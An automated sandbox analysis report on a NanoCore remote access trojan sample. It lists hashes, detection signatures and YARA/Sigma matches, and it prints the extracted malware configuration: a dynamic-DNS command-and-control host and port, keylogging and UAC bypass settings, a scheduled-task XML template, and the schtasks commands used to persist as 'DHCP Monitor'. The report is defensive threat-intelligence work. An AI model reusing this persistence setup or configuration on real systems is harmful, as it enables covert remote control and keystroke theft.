Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report bGf2H3tXGg.exe

Overview

General Information

Sample Name:bGf2H3tXGg.exe
Analysis ID:384149
MD5:f72a7fd231e50f9b43c3dab470364846
SHA1:1ac9f0876ec8f4b95fb0bbae48c2a5b5d02ed411
SHA256:fb01157b437b00f34999faa320bb55c8e44bdbb415e9a15503035bfe0e1d40d6
Tags:exeNanoCoreRAT
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected Nanocore Rat
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
Sigma detected: Scheduled temp file as task from temp location
Yara detected Nanocore RAT
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • bGf2H3tXGg.exe (PID: 4656 cmdline: 'C:\Users\user\Desktop\bGf2H3tXGg.exe' MD5: F72A7FD231E50F9B43C3DAB470364846)
    • bGf2H3tXGg.exe (PID: 204 cmdline: 'C:\Users\user\Desktop\bGf2H3tXGg.exe' MD5: F72A7FD231E50F9B43C3DAB470364846)
      • schtasks.exe (PID: 6280 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpDE28.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 6288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 6320 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpE0E8.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 6456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • bGf2H3tXGg.exe (PID: 6468 cmdline: C:\Users\user\Desktop\bGf2H3tXGg.exe 0 MD5: F72A7FD231E50F9B43C3DAB470364846)
    • bGf2H3tXGg.exe (PID: 6704 cmdline: C:\Users\user\Desktop\bGf2H3tXGg.exe 0 MD5: F72A7FD231E50F9B43C3DAB470364846)
  • dhcpmon.exe (PID: 6600 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: F72A7FD231E50F9B43C3DAB470364846)
    • dhcpmon.exe (PID: 6816 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: F72A7FD231E50F9B43C3DAB470364846)
  • dhcpmon.exe (PID: 6752 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: F72A7FD231E50F9B43C3DAB470364846)
    • dhcpmon.exe (PID: 6212 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: F72A7FD231E50F9B43C3DAB470364846)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "ccf3c62d-d356-4a80-bb94-307bc35a", "Group": "Backup", "Domain1": "backu4734.duckdns.org", "Domain2": "backu4734.duckdns.org", "Port": 8092, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Enable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xff8d:$x1: NanoCore.ClientPluginHost
  • 0xffca:$x2: IClientNetworkHost
  • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0xfcf5:$a: NanoCore
    • 0xfd05:$a: NanoCore
    • 0xff39:$a: NanoCore
    • 0xff4d:$a: NanoCore
    • 0xff8d:$a: NanoCore
    • 0xfd54:$b: ClientPlugin
    • 0xff56:$b: ClientPlugin
    • 0xff96:$b: ClientPlugin
    • 0xfe7b:$c: ProjectData
    • 0x10882:$d: DESCrypto
    • 0x1824e:$e: KeepAlive
    • 0x1623c:$g: LogClientMessage
    • 0x12437:$i: get_Connected
    • 0x10bb8:$j: #=q
    • 0x10be8:$j: #=q
    • 0x10c04:$j: #=q
    • 0x10c34:$j: #=q
    • 0x10c50:$j: #=q
    • 0x10c6c:$j: #=q
    • 0x10c9c:$j: #=q
    • 0x10cb8:$j: #=q
    0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x146bd:$x1: NanoCore.ClientPluginHost
    • 0x146fa:$x2: IClientNetworkHost
    • 0x1822d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      Click to see the 125 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      22.2.dhcpmon.exe.24bcc88.5.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xe75:$x1: NanoCore.ClientPluginHost
      • 0xe8f:$x2: IClientNetworkHost
      22.2.dhcpmon.exe.24bcc88.5.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xe75:$x2: NanoCore.ClientPluginHost
      • 0x1261:$s3: PipeExists
      • 0x1136:$s4: PipeCreated
      • 0xeb0:$s5: IClientLoggingHost
      11.2.bGf2H3tXGg.exe.29c1458.3.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xe38d:$x1: NanoCore.ClientPluginHost
      • 0xe3ca:$x2: IClientNetworkHost
      • 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      11.2.bGf2H3tXGg.exe.29c1458.3.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xe105:$x1: NanoCore Client.exe
      • 0xe38d:$x2: NanoCore.ClientPluginHost
      • 0xf9c6:$s1: PluginCommand
      • 0xf9ba:$s2: FileCommand
      • 0x1086b:$s3: PipeExists
      • 0x16622:$s4: PipeCreated
      • 0xe3b7:$s5: IClientLoggingHost
      11.2.bGf2H3tXGg.exe.29c1458.3.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        Click to see the 355 entries

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\bGf2H3tXGg.exe, ProcessId: 204, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
        Sigma detected: Scheduled temp file as task from temp locationShow sources
        Source: Process startedAuthor: Joe Security: Data: Command: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpDE28.tmp', CommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpDE28.tmp', CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\bGf2H3tXGg.exe' , ParentImage: C:\Users\user\Desktop\bGf2H3tXGg.exe, ParentProcessId: 204, ProcessCommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpDE28.tmp', ProcessId: 6280

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Antivirus detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Local\Temp\nsfEFEC.tmp\xktfu.dllAvira: detection malicious, Label: HEUR/AGEN.1120893
        Source: C:\Users\user\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dllAvira: detection malicious, Label: HEUR/AGEN.1120893
        Source: C:\Users\user\AppData\Local\Temp\nsmE619.tmp\xktfu.dllAvira: detection malicious, Label: HEUR/AGEN.1120893
        Source: C:\Users\user\AppData\Local\Temp\nsp1382.tmp\xktfu.dllAvira: detection malicious, Label: HEUR/AGEN.1120893
        Found malware configurationShow sources
        Source: 00000016.00000002.339334436.00000000034CC000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "ccf3c62d-d356-4a80-bb94-307bc35a", "Group": "Backup", "Domain1": "backu4734.duckdns.org", "Domain2": "backu4734.duckdns.org", "Port": 8092, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Enable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeVirustotal: Detection: 50%Perma Link
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeReversingLabs: Detection: 68%
        Source: C:\Users\user\AppData\Local\Temp\nsfEFEC.tmp\xktfu.dllVirustotal: Detection: 19%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\nsfEFEC.tmp\xktfu.dllMetadefender: Detection: 13%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\nsfEFEC.tmp\xktfu.dllReversingLabs: Detection: 41%
        Source: C:\Users\user\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dllVirustotal: Detection: 19%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dllMetadefender: Detection: 13%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dllReversingLabs: Detection: 41%
        Source: C:\Users\user\AppData\Local\Temp\nsmE619.tmp\xktfu.dllVirustotal: Detection: 19%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\nsmE619.tmp\xktfu.dllMetadefender: Detection: 13%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\nsmE619.tmp\xktfu.dllReversingLabs: Detection: 41%
        Source: C:\Users\user\AppData\Local\Temp\nsp1382.tmp\xktfu.dllVirustotal: Detection: 19%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\nsp1382.tmp\xktfu.dllMetadefender: Detection: 13%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\nsp1382.tmp\xktfu.dllReversingLabs: Detection: 41%
        Multi AV Scanner detection for submitted fileShow sources
        Source: bGf2H3tXGg.exeVirustotal: Detection: 50%Perma Link
        Source: bGf2H3tXGg.exeReversingLabs: Detection: 68%
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.318707635.00000000024E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.317545365.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.488378947.00000000021D0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.323797763.0000000002561000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.323934536.0000000003561000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.326163063.0000000004A62000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.488999685.00000000023D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.338981000.00000000023B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.339113549.0000000002432000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.339334436.00000000034CC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.339201684.0000000002491000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.323984965.000000000359C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.319988300.0000000004A82000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.339302702.0000000003491000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.323578165.00000000024C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.322836165.000000000050C000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.318495205.0000000000859000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.319780906.0000000004960000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.338595453.00000000005A8000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.486901430.0000000000658000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.493192985.0000000003464000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.318855204.000000000351C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: bGf2H3tXGg.exe PID: 4656, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: bGf2H3tXGg.exe PID: 6468, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: bGf2H3tXGg.exe PID: 6704, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: bGf2H3tXGg.exe PID: 204, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6212, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6816, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6600, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6752, type: MEMORY
        Source: Yara matchFile source: 11.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.4960000.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.34e5530.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.3565530.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.4960000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.35de3de.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.2430000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.28b0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.dhcpmon.exe.2870000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.3495530.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.24c0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.3565530.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.35e3214.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.350e3de.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.21d0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.3563214.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.28c1458.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.351783d.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.28b0000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.34e5530.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.28c1458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.24c0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.dhcpmon.exe.2881458.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.dhcpmon.exe.2870000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.3563214.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.525980.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.23b0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.35e783d.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.21d0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.673878.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.356783d.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.355e3de.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.3495530.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.35e3214.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.5c6ad8.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.415058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.673878.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.3470831.12.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.3513214.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.346c208.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.525980.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.346c208.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.3513214.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.872728.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.4a60000.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.872728.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.dhcpmon.exe.2881458.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.5c6ad8.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.23b0000.3.raw.unpack, type: UNPACKEDPE
